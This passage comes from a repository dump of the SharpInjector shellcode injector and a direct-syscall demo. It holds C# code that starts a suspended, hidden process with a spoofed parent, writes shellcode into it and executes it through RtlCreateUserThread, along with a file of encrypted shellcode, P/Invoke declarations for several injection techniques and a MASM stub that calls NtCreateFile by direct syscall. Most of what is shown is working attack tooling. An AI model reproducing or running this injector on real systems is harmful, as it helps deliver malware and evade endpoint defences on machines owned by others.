success = WinAPI.CreateProcess(\n                ProgramPath,\n                null,\n                ref ps,\n                ref ts,\n                true,\n                WinAPI.ProcessCreationFlags.CREATE_SUSPENDED | WinAPI.ProcessCreationFlags.CREATE_NO_WINDOW | WinAPI.ProcessCreationFlags.EXTENDED_STARTUPINFO_PRESENT,\n                IntPtr.Zero,\n                null,\n                ref StartupInfoEx,\n                out ProcessInfo);\n\n            if (ProcessInfo.hProcess == IntPtr.Zero)\n            {\n                return;\n            }\n\n            Console.WriteLine($\"[*] Spawned new instance of {ProgramPath} (pid: {ProcessInfo.dwProcessId})\");\n            Process Target = Process.GetProcessById((int)ProcessInfo.dwProcessId);\n\n            Console.WriteLine(\"[*] Allocating shellcode...\");\n            IntPtr Address = WinAPI.VirtualAllocEx(Target.Handle, IntPtr.Zero, Shellcode.Length, WinAPI.MEM_COMMIT, WinAPI.PAGE_READWRITE);\n            if (Address == IntPtr.Zero)\n            {\n                WinAPI.TerminateProcess(ProcessInfo.hProcess, 0);\n                return;\n            }\n\n            if (!WinAPI.WriteProcessMemory(ProcessInfo.hProcess, Address, Shellcode, Shellcode.Length, out bytesWritten))\n            {\n                WinAPI.Clean(ProcessInfo.hProcess, Address, Shellcode.Length);\n                return;\n            }\n\n            if (!WinAPI.VirtualProtectEx(ProcessInfo.hProcess, Address, Shellcode.Length, WinAPI.PAGE_EXECUTE_READ, out uint OldProtect))\n            {\n                WinAPI.Clean(ProcessInfo.hProcess, Address, Shellcode.Length);\n                return;\n            }\n\n            IntPtr hThread;\n            UInt32 ClientId;\n\n            Console.WriteLine(\"[*] Calling RtlCreateUserThread...\");\n            WinAPI.RtlCreateUserThread(ProcessInfo.hProcess, 0, false, 0, 0, 0, Address, 0, IntPtr.Zero, out hThread, out ClientId);\n\n            WinAPI.CloseHandle(ParentHandle);\n            
Console.WriteLine(\"[*] Shellcode executed\");\n        }\n    }\n}\n"
  },
  {
    "path": "demo3/SharpInjector-master/SharpInjector/SharpInjector.csproj",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"15.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <Import Project=\"$(MSBuildExtensionsPath)\\$(MSBuildToolsVersion)\\Microsoft.Common.props\" Condition=\"Exists('$(MSBuildExtensionsPath)\\$(MSBuildToolsVersion)\\Microsoft.Common.props')\" />\r\n  <PropertyGroup>\r\n    <Configuration Condition=\" '$(Configuration)' == '' \">Debug</Configuration>\r\n    <Platform Condition=\" '$(Platform)' == '' \">AnyCPU</Platform>\r\n    <ProjectGuid>{4744C438-5A65-4EC7-89BD-2A027531B2B0}</ProjectGuid>\r\n    <OutputType>Exe</OutputType>\r\n    <RootNamespace>SharpInjector</RootNamespace>\r\n    <AssemblyName>SharpInjector</AssemblyName>\r\n    <TargetFrameworkVersion>v4.7.2</TargetFrameworkVersion>\r\n    <FileAlignment>512</FileAlignment>\r\n    <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>\r\n    <Deterministic>true</Deterministic>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' \">\r\n    <PlatformTarget>AnyCPU</PlatformTarget>\r\n    <DebugSymbols>true</DebugSymbols>\r\n    <DebugType>full</DebugType>\r\n    <Optimize>false</Optimize>\r\n    <OutputPath>bin\\Debug\\</OutputPath>\r\n    <DefineConstants>DEBUG;TRACE</DefineConstants>\r\n    <ErrorReport>prompt</ErrorReport>\r\n    <WarningLevel>4</WarningLevel>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' \">\r\n    <PlatformTarget>AnyCPU</PlatformTarget>\r\n    <DebugType>pdbonly</DebugType>\r\n    <Optimize>true</Optimize>\r\n    <OutputPath>bin\\Release\\</OutputPath>\r\n    <DefineConstants>TRACE</DefineConstants>\r\n    <ErrorReport>prompt</ErrorReport>\r\n    <WarningLevel>4</WarningLevel>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)' == 'Debug|x64'\">\r\n    <DebugSymbols>true</DebugSymbols>\r\n    
<OutputPath>bin\\x64\\Debug\\</OutputPath>\r\n    <DefineConstants>DEBUG;TRACE</DefineConstants>\r\n    <DebugType>full</DebugType>\r\n    <PlatformTarget>x64</PlatformTarget>\r\n    <LangVersion>7.3</LangVersion>\r\n    <ErrorReport>prompt</ErrorReport>\r\n    <CodeAnalysisRuleSet>MinimumRecommendedRules.ruleset</CodeAnalysisRuleSet>\r\n    <Prefer32Bit>true</Prefer32Bit>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)' == 'Release|x64'\">\r\n    <OutputPath>bin\\x64\\Release\\</OutputPath>\r\n    <DefineConstants>TRACE</DefineConstants>\r\n    <Optimize>true</Optimize>\r\n    <DebugType>pdbonly</DebugType>\r\n    <PlatformTarget>x64</PlatformTarget>\r\n    <LangVersion>7.3</LangVersion>\r\n    <ErrorReport>prompt</ErrorReport>\r\n    <CodeAnalysisRuleSet>MinimumRecommendedRules.ruleset</CodeAnalysisRuleSet>\r\n    <Prefer32Bit>true</Prefer32Bit>\r\n  </PropertyGroup>\r\n  <ItemGroup>\r\n    <Reference Include=\"System\" />\r\n    <Reference Include=\"System.Core\" />\r\n    <Reference Include=\"System.Drawing\" />\r\n    <Reference Include=\"System.Windows.Forms\" />\r\n    <Reference Include=\"System.Xml.Linq\" />\r\n    <Reference Include=\"System.Data.DataSetExtensions\" />\r\n    <Reference Include=\"Microsoft.CSharp\" />\r\n    <Reference Include=\"System.Data\" />\r\n    <Reference Include=\"System.Net.Http\" />\r\n    <Reference Include=\"System.Xml\" />\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <Compile Include=\"Properties\\Resource1.Designer.cs\">\r\n      <AutoGen>True</AutoGen>\r\n      <DesignTime>True</DesignTime>\r\n      <DependentUpon>Resource1.resx</DependentUpon>\r\n    </Compile>\r\n    <Compile Include=\"RtlCreateUserThread.cs\" />\r\n    <Compile Include=\"EtwpCreateEtwThread.cs\" />\r\n    <Compile Include=\"CreateRemoteThread.cs\" />\r\n    <Compile Include=\"CreateFiber.cs\" />\r\n    <Compile Include=\"CreateThread.cs\" />\r\n    <Compile Include=\"CreateRemoteThreadEx.cs\" />\r\n    <Compile 
Include=\"QueueUserAPC.cs\" />\r\n    <Compile Include=\"WinAPI.cs\" />\r\n    <Compile Include=\"Program.cs\" />\r\n    <Compile Include=\"Properties\\AssemblyInfo.cs\" />\r\n    <Compile Include=\"Shellycode.cs\" />\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <None Include=\"App.config\" />\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <EmbeddedResource Include=\"Properties\\Resource1.resx\">\r\n      <Generator>ResXFileCodeGenerator</Generator>\r\n      <LastGenOutput>Resource1.Designer.cs</LastGenOutput>\r\n    </EmbeddedResource>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <None Include=\"Resources\\Image1.bmp\" />\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <None Include=\"Resources\\Image1.png\" />\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <Content Include=\"Properties\\莫文蔚 - 这世界那么多人.mp3\" />\r\n    <None Include=\"Resources\\莫文蔚 - 这世界那么多人.mp3\" />\r\n  </ItemGroup>\r\n  <Import Project=\"$(MSBuildToolsPath)\\Microsoft.CSharp.targets\" />\r\n  <PropertyGroup>\r\n    <PreBuildEvent>\r\n    </PreBuildEvent>\r\n  </PropertyGroup>\r\n</Project>"
  },
  {
    "path": "demo3/SharpInjector-master/SharpInjector/Shellycode.cs",
    "content": "namespace SharpInjector\n{\n\tclass EncryptedShellcode\n\t{\n\t\t// Example calc shellcode\n\t\tpublic string EncSc = \"ypmx+PYrXoQ1YvU5yd8SfBK8GHSWQGxOXW298HKAnHSbW4jSmhjl38UOgVcUvfTEuBLFDn6FD1Bp9mjBLzcY9NZ7BW2bT3Z1WCWhdFe2by2qcFstu6M3d7Fx8bnM87Sk/b1x4UhrQEETW+O9v3YrNlUGjhG4Bcl3J1dojIEt9m9qPWz/VyU6KMufhwH18jgO0I/0tXYlj8bbV/zPKmNFSLb1v4WH/xn2+ON6YwCNDupduM5dQRBzZWNI2cDTxqA8/fmUECTQfxQnf7cjooCQ78U9i2T2B5MrrBMTOnIIHpRwb4rzruJHIA40DpuPLHi2w2wMEWlL2LT8X+09Rqd1jLdciC/PligV9N4tatz4h1g865LhnZKZ1inRTueMTNdfoKOPZZHb1/WB0JnQz4SwbmJygty9eqw0gL7bzb8a6gQC1qGCQpjzx4SRKAexgyM/7hRIc7Opy+Tr/91rNO6om3iWM0JSd+ze/+ttjweJCFbv5EP5rd4VMnq9Y7xJg8Cq\";\n\t}\n}\n"
  },
  {
    "path": "demo3/SharpInjector-master/SharpInjector/WinAPI.cs",
    "content": "﻿using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Text;\nusing System.Threading.Tasks;\nusing System.Runtime.InteropServices;\n\nnamespace SharpInjector\n{\n    class WinAPI\n    {\n        public static readonly UInt32 MEM_COMMIT = 0x1000;\n        public static readonly UInt32 MEM_RESERVE = 0x2000;\n        public static readonly UInt32 PAGE_EXECUTE_READ = 0x20;\n        public static readonly UInt32 PAGE_READWRITE = 0x04;\n        public static readonly UInt32 PROC_THREAD_ATTRIBUTE_PARENT_PROCESS = 0x00020000;\n        public static readonly UInt32 SW_HIDE = 0x0000;\n\n        public struct PROCESS_INFORMATION\n        {\n            public IntPtr hProcess;\n            public IntPtr hThread;\n            public uint dwProcessId;\n            public uint dwThreadId;\n        }\n\n        public struct SECURITY_ATTRIBUTES\n        {\n            public int nLength;\n            public IntPtr lpSecurityDescriptor;\n            [MarshalAs(UnmanagedType.Bool)]\n            public bool bInheritHandle;\n        }\n\n        public struct STARTUPINFO\n        {\n            public uint cb;\n            public string lpReserved;\n            public string lpDesktop;\n            public string lpTitle;\n            public uint dwX;\n            public uint dwY;\n            public uint dwXSize;\n            public uint dwYSize;\n            public uint dwXCountChars;\n            public uint dwYCountChars;\n            public uint dwFillAttribute;\n            public uint dwFlags;\n            public short wShowWindow;\n            public short cbReserved2;\n            public IntPtr lpReserved2;\n            public IntPtr hStdInput;\n            public IntPtr hStdOutput;\n            public IntPtr hStdError;\n        }\n\n        public struct STARTUPINFOEX\n        {\n            public STARTUPINFO StartupInfo;\n            public IntPtr lpAttributeList;\n        }\n\n        public enum StartupInfoFlags : uint\n        
{\n            STARTF_USESHOWWINDOW = 0x00000001,\n            STARTF_USESTDHANDLES = 0x00000100\n        }\n\n        public enum ProcessCreationFlags : uint\n        {\n            CREATE_NO_WINDOW = 0x08000000,\n            CREATE_SUSPENDED = 0x00000004,\n            EXTENDED_STARTUPINFO_PRESENT = 0x00080000\n        }\n\n        public enum ProcessAccessFlags : uint\n        {\n            PROCESS_CREATE_PROCESS = 0x0080,\n            PROCESS_DUP_HANDLE = 0x0040\n        }\n\n        public enum FreeType : uint\n        {\n            MEM_DECOMMIT = 0x4000,\n            MEM_RELEASE = 0x8000,\n        }\n\n        public enum ThreadAccess : int\n        {\n            SET_CONTEXT = 0x0010\n        }\n\n        [DllImport(\"kernel32.dll\")]\n        public static extern bool CloseHandle(\n            IntPtr hObject\n        );\n\n        [DllImport(\"kernel32.dll\")]\n        public static extern IntPtr ConvertThreadToFiber(\n            IntPtr lpParameter);\n\n        [DllImport(\"kernel32.dll\")]\n        public static extern IntPtr CreateFiber(\n            uint dwStackSize,\n            IntPtr lpStartAddress,\n            IntPtr lpParameter);\n\n        [DllImport(\"kernel32.dll\")]\n        public static extern bool CreateProcess(\n            string lpApplicationName,\n            string lpCommandLine,\n            ref SECURITY_ATTRIBUTES lpProcessAttributes,\n            ref SECURITY_ATTRIBUTES lpThreadAttributes,\n            bool bInheritHandles,\n            ProcessCreationFlags dwCreationFlags,\n            IntPtr lpEnvironment,\n            string lpCurrentDirectory,\n            ref STARTUPINFOEX lpStartupInfo,\n            out PROCESS_INFORMATION lpProcessInformation);\n\n        [DllImport(\"kernel32.dll\")]\n        public static extern IntPtr CreateThread(\n            IntPtr lpThreadSecurityAttributes,\n            uint dwStackSize,\n            IntPtr lpStartAddress,\n            IntPtr param,\n            UInt32 dwCreationFlags,\n            
ref UInt32 lpThreadId);\n\n        [DllImport(\"kernel32.dll\")]\n        public static extern IntPtr CreateRemoteThread(\n            IntPtr hProcess,\n            IntPtr lpThreadAttributes,\n            uint dwStackSize,\n            IntPtr lpStartAddress,\n            IntPtr lpParameter,\n            uint dwCreationFlags,\n            IntPtr lpThreadId);\n\n        [DllImport(\"kernel32.dll\")]\n        public static extern IntPtr CreateRemoteThreadEx(\n            IntPtr hProcess,\n            IntPtr lpThreadAttributes,\n            uint dwStackSize,\n            IntPtr lpStartAddress,\n            IntPtr lpParameter,\n            uint dwCreationFlags,\n            IntPtr lpAttributeList,\n            IntPtr lpThreadId);\n\n        [DllImport(\"ntdll.dll\")]\n        public static extern IntPtr EtwpCreateEtwThread(\n            IntPtr lpStartAddress,\n            IntPtr lpParameter);\n\n        [DllImport(\"kernel32.dll\")]\n        public static extern bool InitializeProcThreadAttributeList(\n            IntPtr lpAttributeList,\n            int dwAttributeCount,\n            int dwFlags,\n            ref IntPtr lpSize);\n\n        [DllImport(\"kernel32.dll\")]\n        public static extern IntPtr OpenProcess(\n            ProcessAccessFlags dwDesiredAccess,\n            bool bInheritHandle,\n            int dwProcessId);\n\n        [DllImport(\"kernel32.dll\")]\n        public static extern IntPtr OpenThread(\n            ThreadAccess dwDesiredAccess,\n            bool bInheritHandle,\n            int dwThreadId);\n\n        [DllImport(\"kernel32.dll\")]\n        public static extern IntPtr QueueUserAPC(\n            IntPtr pfnAPC,\n            IntPtr hThread,\n            IntPtr dwData\n            );\n\n        [DllImport(\"kernel32.dll\")]\n        public static extern uint ResumeThread(\n            IntPtr hThread);\n\n        [DllImport(\"kernel32.dll\", EntryPoint = \"RtlMoveMemory\")]\n        public static extern void RtlCopyMemory(\n            IntPtr 
Destination,\n            IntPtr Source,\n            Int32 length);\n\n        [DllImport(\"ntdll.dll\")]\n        public static extern long RtlCreateUserThread(\n            IntPtr hProcess,\n            UInt32 SecurityDescriptor,\n            bool CreateSuspended,\n            ulong StackZeroBits,\n            UInt32 StackReserved,\n            UInt32 StackCommit,\n            IntPtr StartAddress,\n            UInt32 StartParameter,\n            IntPtr Destination,\n            out IntPtr hThread,\n            out UInt32 ClientID);\n\n        [DllImport(\"kernel32.dll\")]\n        public static extern void SwitchToFiber(\n            IntPtr lpFiber);\n\n        [DllImport(\"kernel32.dll\")]\n        public static extern bool TerminateProcess(\n            IntPtr hProcess,\n            uint uExitCode);\n\n        [DllImport(\"kernel32.dll\")]\n        public static extern bool UpdateProcThreadAttribute(\n            IntPtr lpAttributeList,\n            uint dwFlags,\n            IntPtr Attribute,\n            IntPtr lpValue,\n            IntPtr cbSize,\n            IntPtr lpPreviousValue,\n            IntPtr lpReturnSize);\n\n        [DllImport(\"kernel32.dll\")]\n        public static extern IntPtr VirtualAlloc(\n            IntPtr lpAddress,\n            Int32 dwSize,\n            UInt32 flAllocationType,\n            UInt32 flProtect);\n\n       [DllImport(\"kernel32.dll\")]\n        public static extern IntPtr VirtualAllocEx(\n            IntPtr hProcess,\n            IntPtr lpAddress,\n            Int32 dwSize,\n            UInt32 flAllocationType,\n            UInt32 flProtect);\n\n        [DllImport(\"kernel32.dll\")]\n        public static extern bool VirtualFree(\n            IntPtr lpAddress,\n            UInt32 dwSize,\n            FreeType dwFreeType);\n\n        [DllImport(\"kernel32.dll\")]\n        public static extern bool VirtualFreeEx(\n            IntPtr hProcess,\n            IntPtr lpAddress,\n            int dwSize,\n            FreeType 
dwFreeType);\n\n        [DllImport(\"kernel32.dll\")]\n        public static extern bool VirtualProtect(\n            IntPtr lpAddress,\n            int dwSize,\n            uint flNewProtect,\n            out uint lpflOldProtect);\n\n        [DllImport(\"kernel32.dll\")]\n        public static extern bool VirtualProtectEx(\n            IntPtr handle,\n            IntPtr lpAddress,\n            int dwSize,\n            uint flNewProtect,\n            out uint lpflOldProtect);\n\n        [DllImport(\"kernel32.dll\")]\n        public static extern UInt32 WaitForSingleObject(\n            IntPtr hHandle,\n            uint dwMilliseconds);\n\n        [DllImport(\"kernel32.dll\")]\n        public static extern bool WriteProcessMemory(\n        IntPtr hProcess,\n        IntPtr lpBaseAddress,\n        byte[] lpBuffer,\n        int nSize,\n        out IntPtr lpNumberofBytesWritten);\n\n        public static void Clean(IntPtr hprocess, IntPtr address, int length)\n        {\n            VirtualFreeEx(hprocess, address, length, WinAPI.FreeType.MEM_RELEASE);\n            TerminateProcess(hprocess, 0);\n        }\n    }\n}\n"
  },
  {
    "path": "demo3/SharpInjector-master/SharpInjector.sln",
    "content": "﻿\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio Version 16\nVisualStudioVersion = 16.0.29905.134\nMinimumVisualStudioVersion = 10.0.40219.1\nProject(\"{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}\") = \"SharpInjector\", \"SharpInjector\\SharpInjector.csproj\", \"{4744C438-5A65-4EC7-89BD-2A027531B2B0}\"\nEndProject\nProject(\"{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}\") = \"ScEncryptor\", \"ScEncryptor\\ScEncryptor.csproj\", \"{27780A45-FC10-4E68-A461-FCCEAF2D1BD6}\"\nEndProject\nGlobal\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\n\t\tAll|Any CPU = All|Any CPU\n\t\tAll|x64 = All|x64\n\t\tDebug|Any CPU = Debug|Any CPU\n\t\tDebug|x64 = Debug|x64\n\t\tRelease|Any CPU = Release|Any CPU\n\t\tRelease|x64 = Release|x64\n\tEndGlobalSection\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\n\t\t{4744C438-5A65-4EC7-89BD-2A027531B2B0}.All|Any CPU.ActiveCfg = Release|Any CPU\n\t\t{4744C438-5A65-4EC7-89BD-2A027531B2B0}.All|Any CPU.Build.0 = Release|Any CPU\n\t\t{4744C438-5A65-4EC7-89BD-2A027531B2B0}.All|x64.ActiveCfg = Release|x64\n\t\t{4744C438-5A65-4EC7-89BD-2A027531B2B0}.All|x64.Build.0 = Release|x64\n\t\t{4744C438-5A65-4EC7-89BD-2A027531B2B0}.Debug|Any CPU.ActiveCfg = Debug|Any CPU\n\t\t{4744C438-5A65-4EC7-89BD-2A027531B2B0}.Debug|Any CPU.Build.0 = Debug|Any CPU\n\t\t{4744C438-5A65-4EC7-89BD-2A027531B2B0}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{4744C438-5A65-4EC7-89BD-2A027531B2B0}.Debug|x64.Build.0 = Debug|x64\n\t\t{4744C438-5A65-4EC7-89BD-2A027531B2B0}.Release|Any CPU.ActiveCfg = Release|Any CPU\n\t\t{4744C438-5A65-4EC7-89BD-2A027531B2B0}.Release|Any CPU.Build.0 = Release|Any CPU\n\t\t{4744C438-5A65-4EC7-89BD-2A027531B2B0}.Release|x64.ActiveCfg = Release|x64\n\t\t{4744C438-5A65-4EC7-89BD-2A027531B2B0}.Release|x64.Build.0 = Release|x64\n\t\t{27780A45-FC10-4E68-A461-FCCEAF2D1BD6}.All|Any CPU.ActiveCfg = Release|Any CPU\n\t\t{27780A45-FC10-4E68-A461-FCCEAF2D1BD6}.All|Any CPU.Build.0 = Release|Any 
CPU\n\t\t{27780A45-FC10-4E68-A461-FCCEAF2D1BD6}.All|x64.ActiveCfg = Release|Any CPU\n\t\t{27780A45-FC10-4E68-A461-FCCEAF2D1BD6}.All|x64.Build.0 = Release|Any CPU\n\t\t{27780A45-FC10-4E68-A461-FCCEAF2D1BD6}.Debug|Any CPU.ActiveCfg = Debug|Any CPU\n\t\t{27780A45-FC10-4E68-A461-FCCEAF2D1BD6}.Debug|Any CPU.Build.0 = Debug|Any CPU\n\t\t{27780A45-FC10-4E68-A461-FCCEAF2D1BD6}.Debug|x64.ActiveCfg = Debug|Any CPU\n\t\t{27780A45-FC10-4E68-A461-FCCEAF2D1BD6}.Debug|x64.Build.0 = Debug|Any CPU\n\t\t{27780A45-FC10-4E68-A461-FCCEAF2D1BD6}.Release|Any CPU.ActiveCfg = Release|Any CPU\n\t\t{27780A45-FC10-4E68-A461-FCCEAF2D1BD6}.Release|Any CPU.Build.0 = Release|Any CPU\n\t\t{27780A45-FC10-4E68-A461-FCCEAF2D1BD6}.Release|x64.ActiveCfg = Release|Any CPU\n\t\t{27780A45-FC10-4E68-A461-FCCEAF2D1BD6}.Release|x64.Build.0 = Release|Any CPU\n\tEndGlobalSection\n\tGlobalSection(SolutionProperties) = preSolution\n\t\tHideSolutionNode = FALSE\n\tEndGlobalSection\n\tGlobalSection(ExtensibilityGlobals) = postSolution\n\t\tSolutionGuid = {582509EF-455C-4D56-B480-B8FF737B9395}\n\tEndGlobalSection\nEndGlobal\n"
  },
  {
    "path": "demo4/syscall/syscall/Syscall.asm",
    "content": ".code\r\n\t; x64 direct-syscall stub for NtCreateFile, paired with syscall_call.cpp.\r\n\t; The kernel expects the first argument in r10 (rcx is clobbered by the\r\n\t; syscall instruction) and the system service number in eax. 55h is the\r\n\t; NtCreateFile number for one Windows build; service numbers differ between\r\n\t; releases, so this stub is not portable across Windows versions.\r\n\tSysNtCreateFile proc\r\n\t\t\tmov r10, rcx\r\n\t\t\tmov eax, 55h\r\n\t\t\tsyscall\r\n\t\t\tret\r\n\tSysNtCreateFile endp\r\nend"
  },
  {
    "path": "demo4/syscall/syscall/syscall.vcxproj",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <ItemGroup Label=\"ProjectConfigurations\">\r\n    <ProjectConfiguration Include=\"Debug|Win32\">\r\n      <Configuration>Debug</Configuration>\r\n      <Platform>Win32</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Release|Win32\">\r\n      <Configuration>Release</Configuration>\r\n      <Platform>Win32</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Debug|x64\">\r\n      <Configuration>Debug</Configuration>\r\n      <Platform>x64</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Release|x64\">\r\n      <Configuration>Release</Configuration>\r\n      <Platform>x64</Platform>\r\n    </ProjectConfiguration>\r\n  </ItemGroup>\r\n  <PropertyGroup Label=\"Globals\">\r\n    <VCProjectVersion>16.0</VCProjectVersion>\r\n    <ProjectGuid>{9DF66DE1-4F6F-4257-96C8-E20E311FEA00}</ProjectGuid>\r\n    <Keyword>Win32Proj</Keyword>\r\n    <RootNamespace>syscall</RootNamespace>\r\n    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>\r\n  </PropertyGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>true</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>false</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <WholeProgramOptimization>true</WholeProgramOptimization>\r\n    
<CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>true</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>false</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <WholeProgramOptimization>true</WholeProgramOptimization>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\r\n  <ImportGroup Label=\"ExtensionSettings\">\r\n    <Import Project=\"$(VCTargetsPath)\\BuildCustomizations\\masm.props\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"Shared\">\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  
<ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <PropertyGroup Label=\"UserMacros\" />\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <LinkIncremental>true</LinkIncremental>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <LinkIncremental>true</LinkIncremental>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <LinkIncremental>false</LinkIncremental>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <LinkIncremental>false</LinkIncremental>\r\n  </PropertyGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <ClCompile>\r\n      <PrecompiledHeader>\r\n      </PrecompiledHeader>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <Optimization>Disabled</Optimization>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <ClCompile>\r\n      <PrecompiledHeader>\r\n      </PrecompiledHeader>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <Optimization>Disabled</Optimization>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      
<ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <ClCompile>\r\n      <PrecompiledHeader>\r\n      </PrecompiledHeader>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <Optimization>MaxSpeed</Optimization>\r\n      <FunctionLevelLinking>true</FunctionLevelLinking>\r\n      <IntrinsicFunctions>true</IntrinsicFunctions>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\r\n      <OptimizeReferences>true</OptimizeReferences>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <ClCompile>\r\n      <PrecompiledHeader>\r\n      </PrecompiledHeader>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <Optimization>MaxSpeed</Optimization>\r\n      <FunctionLevelLinking>true</FunctionLevelLinking>\r\n      